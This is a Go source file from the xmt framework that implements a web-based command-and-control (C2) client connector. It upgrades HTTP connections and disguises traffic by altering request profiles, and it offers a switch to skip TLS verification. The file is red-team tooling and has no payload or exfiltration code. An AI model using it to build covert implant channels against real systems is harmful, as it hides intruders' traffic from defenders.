github.com/iDigitalFlame/xmt@v0.5.4/com/wc2/client.go (about)

     1  // Copyright (C) 2020 - 2023 iDigitalFlame
     2  //
     3  // This program is free software: you can redistribute it and/or modify
     4  // it under the terms of the GNU General Public License as published by
     5  // the Free Software Foundation, either version 3 of the License, or
     6  // any later version.
     7  //
     8  // This program is distributed in the hope that it will be useful,
     9  // but WITHOUT ANY WARRANTY; without even the implied warranty of
    10  // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    11  // GNU General Public License for more details.
    12  //
    13  // You should have received a copy of the GNU General Public License
    14  // along with this program.  If not, see <https://www.gnu.org/licenses/>.
    15  //
    16  
    17  package wc2
    18  
    19  import (
    20  	"context"
    21  	"crypto/tls"
    22  	"net"
    23  	"net/http"
    24  	"net/http/cookiejar"
    25  	"net/url"
    26  	"strings"
    27  	"sync"
    28  	"sync/atomic"
    29  	"time"
    30  
    31  	"github.com/iDigitalFlame/xmt/com"
    32  	"github.com/iDigitalFlame/xmt/util/xerr"
    33  )
    34  
    35  // Default is the default web c2 client that can be used to create client
    36  // connections. This has the default configuration and may be used "out-of-the-box".
    37  var Default = new(Client)
    38  
    39  // Client is a simple struct that supports the C2 client connector interface.
    40  // This can be used by clients to connect to a Web instance.
    41  //
    42  // By default, this struct will use the DefaultHTTP struct.
    43  //
    44  // The initial unspecified Target state will be empty and will use the default
    45  // (Golang) values.
    46  type Client struct {
    47  	_      [0]func()
    48  	Target Target
    49  	c      *http.Client
    50  	t      transport
    51  
    52  	Timeout time.Duration
    53  }
    54  type client struct {
    55  	_ [0]func()
    56  	r *http.Response
    57  	net.Conn
    58  }
    59  type transport struct {
    60  	next net.Conn
    61  	*http.Transport
    62  
    63  	lock   sync.Mutex
    64  	search uint32
    65  }
    66  
    67  func (c *Client) setup() {
    68  	if c.Timeout <= 0 {
    69  		c.Timeout = com.DefaultTimeout
    70  	}
    71  	var (
    72  		j, _ = cookiejar.New(nil)
    73  		t    = newTransport(c.Timeout)
    74  	)
    75  	c.t.hook(t)
    76  	c.t.Transport = t
    77  	c.c = &http.Client{Jar: j, Transport: t}
    78  }
    79  func (c *client) Close() error {
    80  	if c.r == nil {
    81  		return nil
    82  	}
    83  	err := c.Conn.Close()
    84  	c.r.Body.Close()
    85  	c.r = nil
    86  	return err
    87  }
    88  
    89  // Client returns the internal 'http.Client' struct to allow for extra configuration.
    90  // To prevent any issues, it is recommended to NOT overrite or change the Transport
    91  // of this Client.
    92  //
    93  // The return value will ALWAYS be non-nil.
    94  func (c *Client) Client() *http.Client {
    95  	if c.c == nil {
    96  		c.setup()
    97  	}
    98  	return c.c
    99  }
   100  
   101  // Insecure will set the TLS verification status of the Client to the specified
   102  // boolean value and return itself.
   103  //
   104  // The returned result is NOT a copy.
   105  func (c *Client) Insecure(i bool) *Client {
   106  	if c.t.TLSClientConfig == nil {
   107  		c.t.TLSClientConfig = &tls.Config{InsecureSkipVerify: i}
   108  	} else {
   109  		c.t.TLSClientConfig.InsecureSkipVerify = i
   110  	}
   111  	return c
   112  }
   113  func rawParse(r string) (*url.URL, error) {
   114  	var (
   115  		i   = strings.IndexRune(r, '/')
   116  		u   *url.URL
   117  		err error
   118  	)
   119  	if i == 0 && len(r) > 2 && r[1] != '/' {
   120  		u, err = url.Parse("/" + r)
   121  	} else if i == -1 || i+1 >= len(r) || r[i+1] != '/' {
   122  		u, err = url.Parse("//" + r)
   123  	} else {
   124  		u, err = url.Parse(r)
   125  	}
   126  	if err != nil {
   127  		return nil, err
   128  	}
   129  	if len(u.Host) == 0 {
   130  		return nil, xerr.Sub("empty host field", 0x30)
   131  	}
   132  	if u.Host[len(u.Host)-1] == ':' {
   133  		return nil, xerr.Sub("invalid port specified", 0x31)
   134  	}
   135  	if len(u.Scheme) == 0 {
   136  		u.Scheme = com.NameHTTP
   137  	}
   138  	return u, nil
   139  }
   140  
   141  // Transport returns the internal 'http.Transport' struct to allow for extra
   142  // configuration. To prevent any issues, it is recommended to NOT overrite or
   143  // change any of the 'Dial*' functions of this Transoport.
   144  //
   145  // The return value will ALWAYS be non-nil.
   146  func (c *Client) Transport() *http.Transport {
   147  	if c.c == nil {
   148  		c.setup()
   149  	}
   150  	return c.t.Transport
   151  }
   152  
   153  // SetTLS will set the TLS configuration of the Client to the specified value
   154  // and returns itself.
   155  //
   156  // The returned result is NOT a copy.
   157  func (c *Client) SetTLS(t *tls.Config) *Client {
   158  	c.t.TLSClientConfig = t
   159  	return c
   160  }
   161  
   162  // NewClient creates a new WC2 Client with the supplied Timeout.
   163  //
   164  // This can be passed to the Connect function in the 'c2' package to connect to
   165  // a web server that acts as a C2 server.
   166  func NewClient(d time.Duration, t *Target) *Client {
   167  	return NewClientTLS(d, nil, t)
   168  }
   169  
   170  // NewClientTLS creates a new WC2 Client with the supplied Timeout and TLS
   171  // configuration.
   172  //
   173  // This can be passed to the Connect function in the 'c2' package to connect to
   174  // a web server that acts as a C2 server.
   175  func NewClientTLS(d time.Duration, c *tls.Config, t *Target) *Client {
   176  	x := &Client{Timeout: d}
   177  	if x.setup(); t != nil {
   178  		x.Target = *t
   179  	}
   180  	x.t.TLSClientConfig = c
   181  	return x
   182  }
   183  func (t *transport) RoundTrip(r *http.Request) (*http.Response, error) {
   184  	return t.Transport.RoundTrip(r)
   185  }
   186  
   187  // Connect creates a C2 client connector that uses the same properties of the
   188  // Client and Target instance parents.
   189  func (c *Client) Connect(x context.Context, a string) (net.Conn, error) {
   190  	if c.c == nil {
   191  		c.setup()
   192  	}
   193  	return c.t.connect(x, &c.Target, c.c, a)
   194  }
   195  func (t *transport) request(h *http.Client, r *http.Request) (*client, error) {
   196  	t.lock.Lock()
   197  	atomic.StoreUint32(&t.search, 1)
   198  	var (
   199  		d, err = h.Do(r)
   200  		c      = t.next
   201  	)
   202  	t.next = nil
   203  	atomic.StoreUint32(&t.search, 0)
   204  	if t.lock.Unlock(); err != nil {
   205  		if c != nil { // A masked Conn may still exist.
   206  			c.Close()
   207  		}
   208  		return nil, err
   209  	}
   210  	if d.StatusCode != http.StatusSwitchingProtocols {
   211  		if d.Body.Close(); c != nil {
   212  			c.Close()
   213  		}
   214  		return nil, xerr.Sub("invalid HTTP response", 0x32)
   215  	}
   216  	if c == nil {
   217  		d.Body.Close()
   218  		return nil, xerr.Sub("could not get underlying net.Conn", 0x34)
   219  	}
   220  	return &client{r: d, Conn: c}, nil
   221  }
   222  func (t *transport) dialContext(x context.Context, _, a string) (net.Conn, error) {
   223  	c, err := com.TCP.Connect(x, a)
   224  	if err != nil {
   225  		return nil, err
   226  	}
   227  	if atomic.LoadUint32(&t.search) == 1 {
   228  		t.next = nil // Remove references.
   229  		t.next = c
   230  	}
   231  	// Only mask Conns returned to the Client
   232  	return maskConn(c), nil
   233  }
   234  func (t *transport) dialTLSContext(x context.Context, _, a string) (net.Conn, error) {
   235  	var (
   236  		c   net.Conn
   237  		err error
   238  	)
   239  	if t.TLSClientConfig != nil {
   240  		c, err = com.TLS.ConnectConfig(x, t.TLSClientConfig, a)
   241  	} else {
   242  		c, err = com.TLS.Connect(x, a)
   243  	}
   244  	if err != nil {
   245  		return nil, err
   246  	}
   247  	if atomic.LoadUint32(&t.search) == 1 {
   248  		t.next = nil // Remove references.
   249  		t.next = c
   250  	}
   251  	// Only mask Conns returned to the Client
   252  	return maskConn(c), nil
   253  }
   254  func (t *transport) connect(x context.Context, m *Target, h *http.Client, a string) (net.Conn, error) {
   255  	// URL is empty we will parse it and mutate it with our Target.
   256  	u, err := rawParse(a)
   257  	if err != nil {
   258  		return nil, err
   259  	}
   260  	r := newRequest(x)
   261  	if r.URL = u; m != nil && !m.empty() {
   262  		m.mutate(r)
   263  	}
   264  	c, err := t.request(h, r)
   265  	r = nil
   266  	return c, err
   267  }